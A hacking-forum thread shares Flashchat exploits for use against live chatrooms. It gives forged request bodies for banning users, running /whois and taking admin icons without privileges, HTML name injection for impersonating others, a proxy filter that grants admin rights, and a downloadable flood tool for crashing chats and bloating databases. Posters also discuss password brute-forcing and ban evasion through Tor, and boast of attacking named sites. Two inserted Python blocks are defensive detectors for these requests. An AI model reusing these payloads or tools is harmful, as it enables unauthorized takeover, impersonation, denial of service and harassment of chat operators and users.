Flashchat exploits, hacks, tools & more

Sethioz
Admin
Admin
Posts: 4762
Joined: Fri Jul 27, 2007 5:11 pm
Custom: Gaming YT > https://youtube.com/SethiozEntertainment
Game Hacking YT > https://youtube.com/sethioz
Game Hacks Store > https://sethioz.com/shopz
Location: unknown
Contact:

Flashchat exploits, hacks, tools & more

Post by Sethioz »

A Knowledge Database article on Flashchat exploits is now available. Everything from now on will go there; I will not update this post anymore.

I will collect all the exploits and tools into this very post soon, so it is easy to find all the exploits and tools by only reading first post.
In this topic you will find: (only descriptions for now)

Gadgets:

flashchatz - cmd based program written by Luigi Auriemma. It is a fake user DOS attack and exploit tool for flashchat (attached to post, in downloads and on Luigi's site)

Extreme Flashchat-X - GUI based flashchat client with multiple exploits in it (see below). Written by dark_lord_tnt (see in topic).

Exploits:

The following things can be done without knowing the admin/mod password:
kickout another user (except admin)
ban another user (except admin)
check any user's IP with the "/whois" command
add room/s
ring bell
get any icon/emoticon in front of your name (including admin icon)
get any icon/emoticon into the message

maybe i missed something, but i will update the first post from time to time, and i'll try to add all the exploits into this post.

//////////////////////////////////////////////////////////////////////////////////////////////////////////

Code: Select all

Bell
    sendAndLoad=%5Btype%20Function%5D&b=13355&c=ring&cid=1&id=

    add room
    sendAndLoad=%5Btype%20Function%5D&ps=&p=1&l=Cat&b=93647&c=adr&cid=1&id=

    admin icon:
    sendAndLoad=%5Btype%20Function%5D&a=%3Aadmin%3A&u=0&b=13862&c=ravt&cid=1&id=

    mod icon:
    sendAndLoad=%5Btype%20Function%5D&a=%3Amod%3A&u=0&b=13862&c=ravt&cid=1&id=

    ip ban packet:
    sendAndLoad=%5Btype%20Function%5D&s=7&t=&r=0&u=5581&b=3&c=banu&cid=1&id=
    5581 - id

    whois packet:    
    sendAndLoad=%5Btype%20Function%5D&s=7&t=%2Fwhois%20teele&r=2&u=0&b=20309&c=msg&cid=1&id=

    room alert:
    sendAndLoad=%5Btype%20Function%5D&s=7&t=TEST&r=2&b=18323&c=ralrt&cid=1&id=

    sendAndLoad=%5Btype%20Function%5D&s=7&t=chatalert&b=18370&c=calrt&cid=1&id=  
for paros proxy (or other intercepting proxys), replace this:

Code: Select all

5D&t=
with this:

Code: Select all

5D&s=7&t=
to get some of the admin rights. you will be able to use /kickout, /whois and such commands with this filter.



//////////////////////////////////////////////////////////////////////////////////////////////////////////

HTML/PHP code exploits:

*Invisible name:
enter this as name

Code: Select all

</b> 
*Impersonating others:
-login with invisible name
-now use this command to impersonate somebody

Code: Select all

/me <font color="#000000">[NAME] 0:00 xm: </font>
you can also get icon in front of name (including admin icon)

Code: Select all

/me <font color="#FFFFFF">:D  [NAME]: </font>
where ":D" is smile/icon. to get admin icon in front of name, put ":admin:". here's full example:

Code: Select all

/me <font color="#FF0000">:admin: [NAME]: </font>
-it may vary, depending on the chatroom. some does not use time, some use other font..etc. you must also find the color that this person uses (you can sniff it out from packets). so you just put his/her name into the brackets.

to get colored text too, do this:

Code: Select all

/me <font color="#FF0000">:D [NAME]: </font> <font color"=#8000BF">YOURMESSAGEHERE</font>
*Inject link into your name:
login with the following code/name

Code: Select all

<fontsize="13"></i><a href="http://link.here">Name</a></b> 
where "Name" is the name you want and "http://link.here" is obviously where you insert link.
Attachments
flashchatz.zip
(43.02 KiB) Downloaded 2639 times
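Added example, not part of the original post or of FlashChat's code: a Python check a chat operator could run over logged `getxml.php` POST bodies to flag the request types listed in the post above, plus the escaping that stops the name and `/me` markup tricks. It assumes a server-side session table (`SESSIONS`, hypothetical) that maps the `id` token to the account's real role; the field and command names are the ones quoted in the post, and the tokens and sample bodies are constructed.

```python
import html
import re
from urllib.parse import parse_qs

# Constructed server-side session table: id token -> real role.
# Hypothetical; stands in for whatever the chat server stores at login.
SESSIONS = {
    "0000000000000000000000000000000a": "admin",
    "0000000000000000000000000000000b": "user",
}
ROLE_RANK = {"user": 0, "mod": 1, "admin": 2}

# c= values quoted in the post that act on other users or the whole chat.
PRIVILEGED_COMMANDS = {"banu", "ralrt", "calrt"}
# a= values quoted in the post that display a staff icon.
RESERVED_AVATARS = {":admin:": "admin", ":mod:": "mod"}
# Slash commands the post says become usable once s=7 is added.
STAFF_SLASH = re.compile(r"^/(kickout|whois)\b", re.IGNORECASE)
# Anything that looks like an HTML tag inside chat text.
MARKUP = re.compile(r"</?[A-Za-z][^>]*>")


def parse_body(body):
    """Decode one form-encoded POST body into a flat dict (first value wins)."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def check_request(body, sessions=SESSIONS):
    """Return finding codes for one request; an empty list means nothing flagged."""
    q = parse_body(body)
    # The role comes from the server's own table, never from the request.
    # An empty or unknown id token is treated as the lowest role.
    role = sessions.get(q.get("id", ""), "user")
    rank = ROLE_RANK[role]
    cmd = q.get("c", "")
    text = q.get("t", "")
    findings = []

    # Assumption: ordinary users' clients do not send s=, so its presence
    # from a non-staff session is treated as a forged privilege field.
    if "s" in q and rank == 0:
        findings.append("forged-role")
    if cmd in PRIVILEGED_COMMANDS and rank == 0:
        findings.append("privileged-command")
    needed = RESERVED_AVATARS.get(q.get("a", ""))
    if cmd == "ravt" and needed and rank < ROLE_RANK[needed]:
        findings.append("reserved-avatar")
    if cmd == "msg" and STAFF_SLASH.match(text) and rank == 0:
        findings.append("staff-slash-command")
    if MARKUP.search(text):
        findings.append("markup")
    return findings


def safe_text(value):
    """Escape user-supplied names and messages before they are rendered."""
    return html.escape(value, quote=True)


# Constructed sample bodies: the post's request formats with made-up id tokens.
PREFIX = "sendAndLoad=%5Btype%20Function%5D"
USER_ID = "0000000000000000000000000000000b"
SAMPLES = [
    PREFIX + "&s=7&t=&r=0&u=5581&b=3&c=banu&cid=1&id=" + USER_ID,
    PREFIX + "&a=%3Aadmin%3A&u=0&b=13862&c=ravt&cid=1&id=" + USER_ID,
    PREFIX + "&t=hello&r=2&u=0&b=1&c=msg&cid=1&id=" + USER_ID,
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(check_request(sample), parse_body(sample).get("c"))
    print(safe_text("</b>"))
```

The same role lookup belongs in the request handler itself: a command is carried out only if the server-side role permits it, whatever the request body claims.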
Suicidal Looney
User
User
Posts: 57
Joined: Sun Jul 29, 2007 7:04 am

Re: Flashchatz - flashchat HACKS!!!

Post by Suicidal Looney »

hmm i see

Re: Flashchatz - flashchat HACKS!!!

Post by Sethioz »

oh yea and .. dont use this on our chatroom...it will fuck up db.
makes too much users....
V
Important
Important
Posts: 159
Joined: Sat Jul 28, 2007 7:36 am

Re: Flashchatz - flashchat HACKS!!!

Post by V »

Damn loved the crash, bet those brats were squealing there like stuck pigs.
Last edited by V on Sun Jan 24, 2010 11:46 am, edited 1 time in total.
Skizoteq
Forum user
Forum user
Posts: 108
Joined: Tue Jul 31, 2007 11:41 am

Re: Flashchatz - flashchat HACKS!!!

Post by Skizoteq »

Crashed xxx.xxx.xx many many times with this puppy 8-) Thank you lord for creating this tool lol by lord i mean luigi :D

EDITED by Sethioz : removed the site name, because now this post is public !

Re: Flashchatz - flashchat HACKS!!!

Post by Sethioz »

yes indeed it's a good one from him. I did get him some info he needed. I will start working to get it working with user : pass chatrooms. Luigi said that np there...he just needs me to get him some info. I need to set up a test chat for that.

oh and btw .. one of the whiners from that xxxxxx chat, he has site with chat too .. and you can crash it using proxy LOL. here it is killerbean.pri.ee .. theres chat too...crash it as much as you want :D

Re: Flashchatz - flashchat HACKS!!!

Post by Skizoteq »

killerbean :D What's he whining about lol User : pass chatrooms 8-) Oh man what would i ever do without luigi lol

Re: Flashchatz - flashchat HACKS!!!

Post by Sethioz »

I would have written it myself probably...it's not so hard. only need a few commands and some data.
Btw guys .. i found MAJOR glitch/bug in the flashchat. It involves specially chats with user : pass.
For example if you mess up some chat so badly that admin decides to change it from ''free'' to ''user : pass'' .. then who ever registers first can choose option ''administrator'' ..actually he/she HAVE to choose that. So first registered user will be admin. If you are quicker than admin then you can simple get his place LOL.

Re: Flashchatz - flashchat HACKS!!!

Post by Sethioz »

FIX
If you don't want noobz crashing your chat, change the name of the ''getxml.php'' file. ..and of course you have to modify all the files that use it (index.php, flashchat.php ..etc).

New crash method:
simply open .exe in HEX and modify the ''getxml.php'' to whatever you like.
-note that not all HEX editors work. (you will know if it works or not...if not then you get simple error - not win32 app)


New type of Flashchatz (ill add as attachment).
its still beta, so it doesnt work well. (user flooding works fine, but other options have problems)
-Features :
flood user : pass chatrooms, with all options.
added ''add room'' flooding (IF available for normal users)
added smile flooding ( :D ) ..it causes crash too.

ENJOY!!!

UPDATE
it seems that bell works in all chatrooms, but addroom doesnt seem to work in all chatrooms. I have disabled addroom in my chatroom, but i can still add rooms as normal user.

Re: Flashchatz - flashchat HACKS!!!

Post by Sethioz »

.
Attachments
flashchatz.zip
4.dets.07
(39.94 KiB) Downloaded 1994 times

Re: Flashchatz - flashchat HACKS!!!

Post by Sethioz »

This is hilarious guys :) I was testing with Luigi (he updated the flashchatz) ..he managed to make a ''player flood + bell'' ..so that gave me an idea.
If some fake user can ring bell . .then its possible to everybody. So i did some research .. and FINALLY. i found a way how to ring a bell as normal user (if bell is disabled for normal user).

Interested ? ..course you are. Well what i use is ''Tamper data'' it's a firefox add-on. It totally rocks. it allows you to edit EVERYTHING your browser sends. i'm also using ''live http header'' which Luigi suggested...it's easier to capture data, but it won't work for bell. That's y Luigi never got it working while in chat.
now .. you need the ''ring'' packet. it looks like this

Code: Select all

sendAndLoad=%5Btype%20Function%5D&b=13355&c=ring&cid=1&id=a6657021e8f389f3bc01dcdf0d9c7a54
you DO NOT need the id at end (after id=). im pretty sure you can use this packet.
So what you do is ... you will start tamper (click submit for everything else). you type something in the chat box (DO NOT send it).
for example if you type like ''BLAHTEST1'' ... then press ''send'' and look the tamper. once it gives you pop-up you will click on ''tamper'' this time not ''submit'' ..and look in the right side where the data is. Look closely .. if its the right packet: containing ''BLAHTEST1'' .. then copy the ''ring'' packet (WITHOUT ID !!!!) and replace the whole data there (NOT ID). and then send it ..if it asks something like ... change to ...then click ok.

Little bit messy ? I know ! I will make an video tutorial soon. once you see how tamper works you will understand it ...its easy.

UPDATE
I made video tutorial. hope my talking aint very fucked up (i was a tired)
Its in the Video Tutorials Section. ENJOY :D

Re: Flashchatz - flashchat HACKS!!!

Post by Sethioz »

MAJOR UPDATE:
special thanks to Luigi who wrote the tool.
now it is possible to load users from a file.
user pass
like this. still the old options

1 - user flooding
2 - message flooding
3 - room creation flooding
4 - smile flooding
5 - login/logout flooding
6 - user+bell flooding
+ now you are able to load users from a list.

if you run it, then it will ask you if you want to create users (only for the chatroom that requires registration) then you have 3 options:
y - yes (start making users and flood with specified option)
N - no (do nothing, quit)
filename.txt (loads the specified file, it must be in the same dir with the flashchatz.exe)

YES you can use it to bruteforce user passwords..but simply adding ''victim'' username before each word in your wordlist.
to do this .. you can use cygnus hex editor (it seems that it works best)

it was made ? ..because it is possible to disable registration, so the flashchatz is useless during that. But now you can make users and write them down in file and use them later on. So target chatroom may have registration off, but you can still use existing users :twisted:

note: if you would like some changes ... like username complexity (only numbers, or only symbols instead of mix-alpha-num ones) etc, then let me know. I will make changes and recompile it and upload it.
Attachments
flashchatz.rar
new version of flashchatz (no source code)
(28.38 KiB) Downloaded 1859 times

Re: Flashchatz - flashchat HACKS!!!

Post by Sethioz »

just lil something i did myself...
this version only registers users on attack 1, but does not login. so if u wanna fuck up somebodys database...leave it on for 10 hours or so and it should fuck up database. (run 5-20 instances of it to get good results, even more with good connection, 100-200 should not be problem with 100kb upload, just test) I havent tested this on other attacks but 1, i just edited attack one so it registers only.
fff.exe ?? ..couldnt make up anything better..change it if u dont like it.
oh yes and it also have more complex names, it uses some symbols too in names and passes.

note: theres problem with attack 1 and 6 on original version. IT DOES NOT effect register only version (it doesnt have buffer)!!! it seems that luigi made a small mistake and it has infinite buffer size. in other words...leave it on for hour and bye bye pc (ur pc). Thats because theres no buffer limit, ill fix it someday...IF i need to ..but i doubt. no need for that. you will get banned anyways if you leave it on in some chatroom (crashing).
Attachments
fff.rar
(30.35 KiB) Downloaded 1657 times

Re: Flashchatz - flashchat HACKS!!!

Post by Sethioz »

Update:
Luigi fixed the memory problem and also fixed the problem with ''space'' in user and/or password.
Now you can use users/passes with spaces and it still loads the file as it should.

at this moment (19th april. 08) the latest version is 0.1.2c

I also added the version tht only registers users and don't login. Its remade and tested and works 100%.

I will also add on how to use this tool as password cracker. its very easy ! you only need commview and flashchatz, but i doubt tht any of u lazys need it :) ..so im not gonna post it after all. you can always reply here if u need to know how to crack passwords with it.
Attachments
flashchatz012c.rar
Flashchatz version 0.1.2c (fixed user/pass file reading and memory problem)
(27.73 KiB) Downloaded 1701 times
fregonly.rar
use attack 1 to register users. Its good to fuck up database.
(30.35 KiB) Downloaded 1674 times
david zaragoza
Newbie..
Newbie..
Posts: 8
Joined: Mon Oct 06, 2008 4:00 am
Custom: i hate it when people disgrace me.....

FlashChat ( TuFat ) exploits

Post by david zaragoza »

i need help here to hack a TuFat flash chat

i gt the two programs usually used in this matter(WPE pro and tamper data addon for mozilla)

bt i dnt know how to use it.....

so anybody plz help me........


EDIT by Sethioz: topic name changed from "hack a TuFat flash chat"
If you want more detailed tutorial then check Flashchat exploits topic and reply there ! < theres exploits which allow you to ban and boot without admin/mod privileges and more !

Re: hack a TuFat flash chat

Post by Sethioz »

ok do you mean "tufat flash chat" or just "flashchat" .. is tufat like name of the site/room or is it name of the actual chat system ?
have you looked this-Video- ?
tamper data and WPE are quite good in this matter. If it is some kind of chat system, then link would be good.

Re: hack a TuFat flash chat

Post by david zaragoza »

i meant tufat flashchat

its the name of the chat system

u can google it for more info

wat i want is an immortal mode where u can enter back just after been banned

do u know a way to do this ?

Re: hack a TuFat flash chat

Post by Sethioz »

googling doesn't help me at all, i need example room where to test. reading about it won't give an idea how it works.
to me it seems that tufat flashchat is same as flashchat (one on my site).

as about banning, no there is no way to bypass IP or username ban. It is SQL based and you would need to hack into flashchat/site config files and SQL database to lift the ban. only way is to use other username and IP address.
you can also use proxy server. I have done research on it and the ip is only checked when connecting to flashchat. proxy server lags so it is not good to chat with proxy. what you can do is use proxy to login and then take it off.
You can use Vidalia+TOR and then firefox's addon called ProxySel
with that you will be able to enable/disable proxy with just one click, making it extremely easy to use proxy.

1. enable proxy
2. log into chatroom
3. disable proxy

that way also when admin/moderator checks your ip he/she will see the proxy ip you used to log into chatroom. FlashChat is weak and it does not check IP again. only checks it when you log into chat. I havent checked it, but maybe it is even possible to modify some packets so it wont send ip at all so flashchat thinks you are local client.

If you want more details and info .. give me URL to the chatroom you want to "hack". then i can take a look at it, if its same as mine or not.

Re: hack a TuFat flash chat

Post by david zaragoza »

the tufat flashchat is the same as in ur site....

im a rookie , so i dnt have any idea on how to hack into flashchat config files
abt proxy server, i tried it bt it seems to dnt work....
the firefox addon is nt compatible with my version of mozilla firefox 3.0...pity me

anyway i think its quite hard to hack just like tat....

bt i tried ur video tutorial on getting the admin or mod icon n it worked perfectly....

all the normal chatters thought im an admin....i even made fun with them by saying ur selected as a mod....lolz

had fun with tat....thank u very much sethioz....

bt i had to logout asap when the mod or admin enters.....to avoid being banned ....
then the chatroom mods can view my ip also .... i wanna be an invinsible rookie hacker....lolz




okie then ...how abt this .....changing the message name so it appears like somebody else said tat n make the somebody get banned instead of u....lolz


i read abt it in the topic "FLASHCHAT:ADMIN CONTROL PANEL"

ur msg in tat topic-

"as for more general. chatrooms are very vulnerable. i mean all kinds. for examples:
-in some chatrooms you can change message name, so it appears like somebody else said that (so you can get somebody else banned lol)....."


i actually watched this hack happened in a chatroom while i was chattin.....

the person wrote vulgar words n changed the message name to other person's name in the chatroom(the same chatroom url i sent to u by PM)....

n wow .........it gt the moderator to ban many innocent peoplez ..even me.....damm tat stupid mod......lolz....

so how abt it .....if u teach me how to do it ...it would be great deal of fun plus education...

futhermore knowledge is power ....:-)

Re: hack a TuFat flash chat

Post by Sethioz »

yes it seems same, y u didnt want to post it out on public ? (url of chat i mean).
It also seem to be customized flash, it is not normal chatroom or at least it seems so. on some reason i didnt even got any data so icon or anything else didnt work on some reason. I just took a quick look in it. but the tool works perfectly :) (tool used to flood shit out of chatroom) it supports many different attack types: userflooding, message flooding, room creation ..etc. It does nothing to the chatroom itself, but it will crash browser's flash script...so everybody have to leave and relogin.
I've been in chatroom many times when it was used on chat .. and sometimes it even crashed my whole browser..doh.

as i said before, you can't bypass IP or username ban. only way is to change your IP or use proxy.
about firefox 3 .. it sucks big time. i even dunno why they made it. it looks childish and lags and doesn't support IMPORTANT addons..like proxysel, but you can always set proxy manually in settings. just put 127.0.0.1 9050 as proxy in firefox, but its annoying and u can't quickly enable/disable it. so i suggest you to get firefox 2 instead. its better in every way.

I will take another look in it anyways (chat).


Update:
i dunno what happend before, but now everything works :) It indeed is same flashchat, just didn't know its called tufat.
specific chatroom you talk about is not on the url you sent me. owner of site has moved the index.php of flashchat to another domain. ill give an example here:
flashchat.com/index.php - this is the chatroom where you sent me and this is where you login.
tufatchat.org/blahdoh/ - this is the path where all other chatroom files are located.

It doesn't really matter where the index is located, because it still sends info into right chatroom if you copy the index.php of the chat. I really have no clue how somebody was able to talk under other names in flashchat, because as far as i know it is ID based.
for example as shown in my tutorials, this is the admin icon:

Code: Select all

sendAndLoad=%5Btype%20Function%5D&a=%3Aadmin%3A&u=0&b=13862&c=ravt&cid=1&id=
now look at the last bit of this data "id=" this is the id part. i left it empty, because you get id when you login or visit the getxml.php page. if you go directly to "getxml.php" (its the page that handles data sent by clients) you get this:

Code: Select all

	<response id="a71b57051abd921b01e995bbf31fca84">
<lout id="665982" t="6:22 pm">login</lout>
</response>
so it gives you id when you visit it too, but i dont think you can use this to talk under other name. you would need to know other person's ID and even then it somehow simply disconnects you.

You can try this ofcourse:
open private window with somebody (i suggest you use help of ur friend).
use commview or WPE pro or something like that to monitor your private messaging.
it should show you other person's ID, but im not sure.
then you can use tamper data and change your ID while sending message.
just like changing icons..etc. you monitor it with tamper data and click tamper, but change only ID not data.

ah yes. i got banned, so i had to use proxy myself. it works like a charm. i only loaded chatroom page with proxy. thats all you need to do. your IP is checked by chatroom only when you LOAD the page, not when you login. so enable proxy and LOAD the "index.php" and then you can disable proxy and login :) just to make it clear:

1. enable proxy
2. go to flashchat.com/index.php (where you see login screen)
3. disable proxy
4. enter name and login

almost forgot. a lil show-off at end :) check the pic and look closely for my message and name there ;)
Attachments
adminlol.JPG
(150.61 KiB) Downloaded 11338 times

Re: hack a TuFat flash chat

Post by david zaragoza »

sethioz .....u r the best .......

keep it up......thx for ur help....

i try out ur tutorial n give u the updates .....

n if u happen to get more flashchat hacks ....plz share wit me ....im always here to learn abt it...

thanx again...

Re: hack a TuFat flash chat

Post by Sethioz »

:)
im sure there's more things that can be done, i just haven't exploited it more. Tried banning and booting only once and also same with talking under other names. boot worked, but im not sure what i did. think i used admin ID, but everyone can be admin if you use right password.
you can just mess around with tamper data and commview can be useful too.

oh yes. and you can create unbootable users lol, but you cant talk under them. you simply have to send the "join" packet again with different username (username has to be in same lenght or packet checksum is not same and it wont deliver) so the user you send with packets will appear, but is unbootable.

Re: hack a TuFat flash chat

Post by david zaragoza »

u said the tools ....wat do u mean by tat ....n how to use it

n also the attack types(userflooding,message flooding n etc)

n how to make all the chatters to leave and relogin ?...

and then the firefox 3 ...i uninstalled it ...now im using firefox 2.0 with the proxysel addon.....hoooooraay..

ur msg:
"tufatchat.org/blahdoh/ - this is the path where all other chatroom files are located"

this is wat u said earlier ..
so does it mean the mods password,admins password and banned ip's are kept there..

if it is ...then how to hack to the filez..n then also this part below i tried repetiting reading bt still cant get it....

ur msg:
"now look at the last bit of this data "id=" this is the id part. i left it empty, because you get id when you login or visit the getxml.php page. if you go directly to "getxml.php" (its the page that handles data sent by clients) you get this:

<response id="a71b57051abd921b01e995bbf31fca84">
<lout id="665982" t="6:22 pm">login</lout>
</response> "



anyway the proxysel addon ...i donno why it did nt work


i gt banned n then i closed the chat window n enabled the proxy b4 pressing the enter chat button...

after the login screen appears ...i turned off the proxy n input a different nick....n to my amazement it still displays 'YOU HAVE BEEN BANNED!'....mothaafuckaaz...

i tried alot of different proxy servers bt it still turned out to be same...

then the only way i can enter bck is by disconnecting n connecting again(i have a broadband connection wit dynamic IP)

n no clue why i cant use proxysel..

okay then ....


the last part here ...i dnt quite get u...can u plz explain more ..

"oh yes. and you can create unbootable users lol, but you cant talk under them. you simply have to send the "join" packet again with different username (username has to be in same lenght or packet checksum is not same and it wont deliver) so the user you send with packets will appear, but is unbootable"

wats unbootable users?

n also if there is a way to hack into the chatroom server ...it would be a big help ....

Re: hack a TuFat flash chat

Post by Sethioz »

i attached the tool. Luigi wrote it, because im not that good with C.
unbootable - it means the user cannot be booted, kicked or banned.
i used Net Tools 5 to make those users. It really pisses admins and mods off lmao. when some user pops up with name like .. BOOT_ME! and there is nothing they can do LOL. or name like I_OWN_U. usually everybody will be in PANIC!, specially admins and mods. I also think that those fake unbootable users can be made using "tcpfp". it is one good tool written by Luigi.

You can't just enable proxysel, you have to set a proxy server first ! use this to check your IP:
-IP Check-
as i said, proxysel is just for enabling/disabling proxy, it is NOT a proxy server. you have to add a valid proxy server into list first.
I also told you to get Vidalia+TOR (proxy servers). install it and run it. default port where it runs is 9050. so it will be running on local ip:
127.0.0.1:9050
this is what you set in proxysel. you will make it use TOR. This is what i have in proxysel:
IP - 127.0.0.1
Port - 9050
Socks4

I also said that you have to LOAD the login page with proxy, not enter with it. So enable proxy and LOAD the chat index.php page, then take proxy off and enter.
Attachments
flashchatz.rar
flashchat fake player tool
(32.62 KiB) Downloaded 883 times

Re: hack a TuFat flash chat

Post by david zaragoza »

ok now i have vidalia,tor n also privoxy ......plus firefox addon proxysel..........

now how i can utilize it .....

Re: hack a TuFat flash chat

Post by Sethioz »

eem .. you dunno how to run vidalia ?
as about privoxy. i've tried 2 times and didnt got it working. as i said about proxysel:
make a new proxy with the settings i gave.
then simply run vidalia (it will run TOR automatically) and enable proxysel (choose the proxy you made ofcourse).
Attachments
MSNscreen_293.png (4.95 KiB) Viewed 63305 times

Re: hack a TuFat flash chat

Post by david zaragoza »

the Tor suckz ....

bt now im raged ....i wanna hack into the server ...do u know a way?

Re: hack a TuFat flash chat

Post by Sethioz »

TOR is one of the best proxys there is.. its not one server, but many. why it sucks ? slow ? or you simply can't get it working ?
yes there's lots of ways to hack into a site, but it's not that simple. you need to run several scans and tests. ofcourse you can use flashchatz to bruteforce users too, but its long and dunno if i wanna put it out on public.
If you intrested in bruteforcing .. then in short. option 1 can take users from list, but it does not save the valid user:pass, so i used commview's filters and alarms to stop the flashchatz on right place and get the password. i also used HEX to make a wordlist with username in front of it (flashchatz format). you can add me into MSN or PM me if you wanna know details about it. it very likely that admin uses same password on site too.

Re: hack a TuFat flash chat

Post by david zaragoza »

yea ..okay bro ...thanx ...

Re: hack a TuFat flash chat

Post by Sethioz »

LMAO, i just found something awesome, but i don't think i'll post it in public :D

Re: Flashchatz - flashchat HACKS!!!

Post by Sethioz »

PERMANENT admin rights in EVERY flashchat !!!
thats right, you read right.

its easy ! here's the packets:

Code: Select all

Bell
sendAndLoad=%5Btype%20Function%5D&b=13355&c=ring&cid=1&id=

add room
sendAndLoad=%5Btype%20Function%5D&ps=&p=1&l=Cat&b=93647&c=adr&cid=1&id=

admin icon:
sendAndLoad=%5Btype%20Function%5D&a=%3Aadmin%3A&u=0&b=13862&c=ravt&cid=1&id=

mod icon:
sendAndLoad=%5Btype%20Function%5D&a=%3Amod%3A&u=0&b=13862&c=ravt&cid=1&id=

ip ban packet:

sendAndLoad=%5Btype%20Function%5D&s=7&t=&r=0&u=5581&b=3&c=banu&cid=1&id=
5581 - id

whois packet:

sendAndLoad=%5Btype%20Function%5D&s=7&t=%2Fwhois%20NAME&r=2&u=0&b=20309&c=msg&cid=1&id=


room alert:
sendAndLoad=%5Btype%20Function%5D&s=7&t=TEST&r=2&b=18323&c=ralrt&cid=1&id=

sendAndLoad=%5Btype%20Function%5D&s=7&t=chatalert&b=18370&c=calrt&cid=1&id=
now the harder part. I am using paros proxy to do the filtering automatically so you will have admin rights :)
to get access to ban commands and whois..etc. you simply have to replace

Code: Select all

5D&t=
with

Code: Select all

5D&s=7&t=
and you can boot/ban ..etc ppl with a command.
now where you make it ?!
1. in paros proxy.
2. go to "tools" - "filter"
3. replace HTTP body rule
-this is where you do it. enable it and make your browser go thru the paros.

Lets take a look at one other packet.
Original Room Alert packet used by admins/mods:

Code: Select all

sendAndLoad=%5Btype%20Function%5D&s=0&t=TEST&r=2&b=18323&c=ralrt&cid=1&id=
modified Room Alert packet, that can be used by non-admin/mod:

Code: Select all

sendAndLoad=%5Btype%20Function%5D&s=7&t=TEST&r=2&b=18323&c=ralrt&cid=1&id=
see the difference ? s=0 is replaced with s=7. you can't make a filter here, because when you are a normal user your packet will be totally different. you can use good old tamper data here, to use the whole packet.

Re: hack a TuFat flash chat

Post by Sethioz »

This new stuff i found really got me interested in it again. Basically you can do anything you want. Here's some values in packets, which i found out during my research. you can manipulate flashchat by changing those values in packets.

Code: Select all

t=
this is a text message sent into server. for example t=blah is like:
blah
this is how it looks in chat.

Code: Select all

u=
user. this is user id. it is used to PM or ban. Here's a PERFECT way to sniff out IDs. when you enter chatroom, then server sends you a response with all users and their IDs. it should be second response packet from server. For example when you send normal message, then the code part looks like this:

Code: Select all

t=blahblah&u=0
so 0 is public, but if you sniff out the user ID and use that instead. like so:

Code: Select all

t=blahblah&u=303
then you will send your text to the user whose id is 303.

Code: Select all

c=
this is type of the message i guess. here's few variables:
ring - rings the bell
msg - message
banu - ban and ban ip

there's also r=, b=, s= ..etc, but im not sure what they do. "r" seems to be on 2 always (r=2).

i also found 2 tools that come in handy if you want to hack chatrooms:
WebScarab and Paros Proxy. both can intercept data. paros can make filters too, but it lags. webscarab can also intercept and edit responses.
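A server-side check for the request bodies quoted in the two posts above, added here as an example (it is not FlashChat's code and not from the thread): privilege comes from the server's own session record, and body fields that only show up in edited requests are reported. The role names, the staff-only command set and the session lookup are assumptions; the normal-user body in the sample list is constructed.

```python
from urllib.parse import parse_qs

STAFF_ROLES = {"admin", "mod"}                 # assumed role names
# c= codes copied from the quoted request bodies; assumed to be staff-only.
STAFF_COMMANDS = {"banu", "ralrt", "calrt", "adr"}
RESERVED_AVATARS = {":admin:", ":mod:"}        # a= values from the icon requests
STAFF_SLASH_COMMANDS = ("/whois",)             # sent inside t= with c=msg


def check_request(session_role, raw_body):
    """Return a list of violations; an empty list means the request may proceed.

    session_role must come from the server's session store (hypothetical
    lookup, not shown). Nothing inside raw_body is trusted for authorization.
    """
    parsed = parse_qs(raw_body, keep_blank_values=True)
    fields = {key: values[-1] for key, values in parsed.items()}
    if session_role in STAFF_ROLES:
        return []
    violations = []
    cmd = fields.get("c", "")
    if cmd in STAFF_COMMANDS:
        violations.append(f"staff command c={cmd}")
    # Per the thread, a normal user's body has no s= field until it is edited in.
    if "s" in fields:
        violations.append(f"unexpected s={fields['s']}")
    if cmd == "msg" and fields.get("t", "").lower().startswith(STAFF_SLASH_COMMANDS):
        violations.append("staff slash command in t=")
    if cmd == "ravt" and fields.get("a", "") in RESERVED_AVATARS:
        violations.append(f"reserved avatar a={fields['a']}")
    return violations


def audit(entries):
    """entries: iterable of (session_role, raw_body). Returns only flagged ones."""
    flagged = []
    for role, body in entries:
        found = check_request(role, body)
        if found:
            flagged.append((role, body, found))
    return flagged


PREFIX = "sendAndLoad=%5Btype%20Function%5D"
SAMPLES = [
    ("user", PREFIX + "&t=hello&r=2&u=0&b=20309&c=msg&cid=1&id="),   # constructed
    ("user", PREFIX + "&s=7&t=TEST&r=2&b=18323&c=ralrt&cid=1&id="),
    ("user", PREFIX + "&s=7&t=%2Fwhois%20NAME&r=2&u=0&b=20309&c=msg&cid=1&id="),
    ("user", PREFIX + "&a=%3Aadmin%3A&u=0&b=13862&c=ravt&cid=1&id="),
    ("admin", PREFIX + "&s=0&t=TEST&r=2&b=18323&c=ralrt&cid=1&id="),
]

if __name__ == "__main__":
    for role, body, found in audit(SAMPLES):
        print(role, found)
```

The same function can run inline as a gate before the command handler or offline over captured request bodies joined with session records.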
david zaragoza2
Newbie..
Newbie..
Posts: 5
Joined: Thu Oct 30, 2008 2:16 pm

Re: hack a TuFat flash chat

Post by david zaragoza2 »

sorry sethioz ...i have been away ...

n by the way ...i cant log in wit my original user id( have no idea why is tat)...

so this is my new id

....the topic up there caught my eye ....

which program u used .....tamper data, wpe , or ....

pls tel me ....

Re: hack a TuFat flash chat

Post by Sethioz »

out of topic and not discussing it here anymore, but guess u too lazy to read NEWS in chatbox and IMPORTANT topic (so you should do so now).

well yes i used tamper data. also webscarab and paros.
jimmyx02
Newbie..
Newbie..
Posts: 14
Joined: Tue Jun 23, 2009 11:26 pm

Re: Flashchat exploits - flashchatz and more ! boot, ban..etc !

Post by jimmyx02 »

i over abused this flash chat site ------------> http://www.ffy.com with tamper data and they blocked mozilla firefox (i was banning ppl)
anyway to get around this?? u mentioned paros proxy but i find it difficult to use can u explain in details how to use it and make it run through
any browser?? .dh.
Last edited by jimmyx02 on Sat Jun 27, 2009 5:13 am, edited 1 time in total.

Re: Flashchat exploits - flashchatz and more ! boot, ban..etc !

Post by jimmyx02 »

ok...never mind i got it to work but wat if they ban me while im using paros proxy??? it seems the only way i can have mod
control is when i log in with the paros on my browser

Re: Flashchat exploits - flashchatz and more ! boot, ban..etc !

Post by Sethioz »

they banned firefox ? if they are really so dumb that they banned browser, then you can download "user agent switcher" from firefox add-ons, this allows you to appear as using other browser (anything you want, even custom)

paros is not so hard to use once you know what you're changing, i used the filter options, but i can't remember which one was the right one, well you can test and see which option works. there's some header, data...or something.

